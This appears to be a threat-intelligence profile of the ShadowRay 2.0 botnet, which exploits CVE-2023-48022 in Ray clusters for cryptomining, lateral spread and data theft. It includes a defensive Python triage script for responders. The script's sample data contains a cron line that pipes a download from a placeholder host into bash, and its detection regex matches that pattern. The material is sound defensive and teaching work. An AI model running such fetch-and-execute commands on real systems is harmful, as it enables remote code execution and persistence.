ShadowRay
ShadowRay 2.0 is a malware campaign and self-propagating cryptomining botnet targeting internet-exposed Ray clusters. It exploits CVE-2023-48022, a critical missing-authentication/remote code execution issue in the Ray framework, by abusing exposed Ray dashboards and the unauthenticated Job Submission API (/api/jobs/) to execute reconnaissance commands and multi-stage Bash and Python payloads. Oligo Security reported the activity as an evolution of earlier ShadowRay exploitation observed between September 2023 and March 2024, with the newer campaign active since at least September 2024.
The malware is designed to hijack AI compute infrastructure, especially clusters with NVIDIA GPUs, and uses Ray orchestration features to spread across all nodes in a cluster and to other exposed Ray environments, effectively behaving like a worm. Payload delivery infrastructure was observed on GitLab and later GitHub after takedowns. Reported operator naming includes IronErn440. Oligo assessed the payloads were likely generated with assistance from large language models based on code structure, comments, and error-handling patterns.
Observed capabilities include deployment of XMRig for Monero mining, CPU throttling to about 60% to reduce detection, process masquerading as legitimate Linux kernel worker services or under names such as "dns-filter," termination of competing miners, blocking of rival mining pools via /etc/hosts and iptables, persistence via cron jobs running every 15 minutes and, in some reporting, systemd modifications, and establishment of Python reverse shells for remote control. The malware also uses Ray scheduling and orchestration features to move laterally to nodes that are not internet-facing. Region-specific behavior was observed for victims in China.
Beyond cryptomining, compromised Ray clusters were reported as being used for DDoS activity via Sockstress, a TCP state exhaustion tool, and for access to sensitive assets present on clusters, including source code, AI models and datasets, cloud credentials, database credentials, and retained production data. The campaign has been described as global in scope, with reporting citing more than 230,000 publicly accessible Ray servers and attacks against over 200,000 exposed Ray servers worldwide.
High-confidence indicators and artifacts mentioned in reporting include exploitation of CVE-2023-48022; abuse of the Ray Dashboard port 8265 and /api/jobs/ endpoint; use of XMRig and Sockstress; cron-based reinfection/update checks every 15 minutes; reverse shells; and attacker-controlled GitLab/GitHub infrastructure including repository account names such as "ironern440-group" and "thisisforwork440-ops."
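As an added example (not code from Oligo, the Ray project, or this page), the following Python script turns the indicators above into four host-side checks a responder can run over collected artifacts: job-API writes to the Ray dashboard from non-internal addresses, */15 cron jobs that pipe a download into a shell, mining-pool sinkholes in /etc/hosts, and processes masquerading as kernel workers or as "dns-filter". The access-log shape, the pool domain `pool.example`, the placeholder URL and every sample row are constructed assumptions; real Ray dashboard logs differ, so the `ACCESS_RE` pattern is the part to adapt.

```python
"""
Defender-side triage for the ShadowRay 2.0 indicators described in the reporting.
Added example; not code from Oligo, Ray or the Mallory page. The access-log
format, the pool hostname and all sample artifacts below are constructed.
"""
import re
from ipaddress import ip_address, ip_network

JOB_API_PREFIX = "/api/jobs"                # unauthenticated endpoint named in reporting
MASQUERADE_NAMES = {"dns-filter"}           # fake service name named in reporting
# "*/15 * * * * <cmd>": the 15-minute re-infection schedule named in reporting
CRON_EVERY_15 = re.compile(r"^\*/15(\s+\*){4}\s+(?P<cmd>.+)$")
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b|\bpython3?\s+-c\b")
# Assumed, constructed access-log shape: "<client_ip> <METHOD> <path> <status>"
ACCESS_RE = re.compile(r"^(?P<ip>\S+)\s+(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+(?P<status>\d{3})$")
# Explicit internal ranges rather than ipaddress.is_private, which also treats
# documentation ranges such as 203.0.113.0/24 as private.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def is_internal(addr):
    return any(addr in net for net in INTERNAL_NETS)


def external_job_submissions(access_lines):
    """Job-API writes (POST/PUT) whose client address is outside the internal ranges."""
    hits = []
    for line in access_lines:
        m = ACCESS_RE.match(line.strip())
        if not m or m["method"] not in ("POST", "PUT") or not m["path"].startswith(JOB_API_PREFIX):
            continue
        try:
            addr = ip_address(m["ip"])
        except ValueError:
            continue                          # malformed client field; skip rather than crash
        if not is_internal(addr):
            hits.append((m["ip"], m["path"]))
    return hits


def cron_reinfection_jobs(crontab_lines):
    """*/15 schedules whose command pipes a download into a shell or runs inline Python."""
    return [m["cmd"] for m in (CRON_EVERY_15.match(l.strip()) for l in crontab_lines)
            if m and REMOTE_FETCH.search(m["cmd"])]


def pool_sinkholes(hosts_lines, pool_domains):
    """/etc/hosts entries that pin a known mining-pool domain to a non-routable address."""
    found = []
    for line in hosts_lines:
        parts = line.split("#", 1)[0].split()   # drop comments, then split fields
        if len(parts) >= 2 and parts[0] in ("127.0.0.1", "0.0.0.0", "::1"):
            found.extend(name for name in parts[1:] if name in pool_domains)
    return found


def masqueraded_processes(process_rows):
    """process_rows: (pid, comm, exe). Genuine kworker threads have no on-disk binary,
    so a 'kworker' with an exe path, or a known fake service name, is suspect."""
    return [(pid, comm, exe) for pid, comm, exe in process_rows
            if (comm.startswith("kworker") and exe) or comm in MASQUERADE_NAMES]


def triage(access_lines, crontab_lines, hosts_lines, process_rows, pool_domains):
    """Aggregate all four checks; any non-empty list warrants incident handling."""
    return {
        "external_job_api_writes": external_job_submissions(access_lines),
        "cron_reinfection": cron_reinfection_jobs(crontab_lines),
        "pool_sinkholes": pool_sinkholes(hosts_lines, pool_domains),
        "masqueraded_processes": masqueraded_processes(process_rows),
    }


# Constructed sample artifacts (not real IoCs; placeholder.invalid and pool.example are reserved names).
SAMPLE_ACCESS = [
    "10.0.0.7 GET /api/jobs/ 200",
    "203.0.113.9 POST /api/jobs/ 200",
    "203.0.113.9 GET / 200",
]
SAMPLE_CRONTAB = [
    "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf",
    "*/15 * * * * curl -s http://placeholder.invalid/u.sh | bash",
]
SAMPLE_HOSTS = ["127.0.0.1 localhost", "0.0.0.0 pool.example # constructed"]
SAMPLE_PROCS = [
    (1201, "kworker/0:1", ""),                     # real kernel thread: no exe
    (4412, "kworker/u8:2", "/tmp/.x/kworker"),     # user-space binary wearing a kernel name
    (4420, "dns-filter", "/opt/dns-filter"),
]
SAMPLE_POOLS = {"pool.example"}

if __name__ == "__main__":
    for name, hits in triage(SAMPLE_ACCESS, SAMPLE_CRONTAB, SAMPLE_HOSTS, SAMPLE_PROCS, SAMPLE_POOLS).items():
        print(f"{name}: {hits}")
```

The checks are deliberately independent so each can be fed from whatever collection you already have (dashboard logs, `crontab -l` output, `/etc/hosts`, a `ps`-style dump with `/proc/<pid>/exe` resolved); the job-API check is the earliest signal, since it fires at initial access rather than after the miner is installed.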
Vulnerabilities exploited
1 CVE correlated with this family across public research and vendor advisories.
A global campaign dubbed ShadowRay 2.0 hijacks exposed Ray Clusters by exploiting an old code execution flaw to turn them into a self-propagating cryptomining botnet.
Groups observed using it
1 distinct threat actor attributed by public researchers.
Recent activity
8 sources tracked across advisories, community write-ups, and news.
Self-replicating cryptomining botnet targeting Ray clusters with NVIDIA GPUs; exploits an unpatched Ray framework flaw.
ShadowRay 2.0 is a self-propagating botnet and cryptomining malware campaign that targets exposed Ray framework clusters. It hijacks AI infrastructure for cryptomining, data theft, and further botnet expansion, leveraging a critical RCE vulnerability (CVE-2023-48022) in Ray. The malware also steals credentials, cloud tokens, proprietary AI models, and source code.
ShadowRay 2.0 is a botnet malware that hijacks AI systems, turning them into self-propagating bots in a global campaign.
A cryptomining botnet exploiting a 2-year-old authentication flaw in Ray's AI framework (CVE-2023-48022), targeting exposed GPU clusters for cryptomining, DDoS, data exfiltration, and autonomous propagation.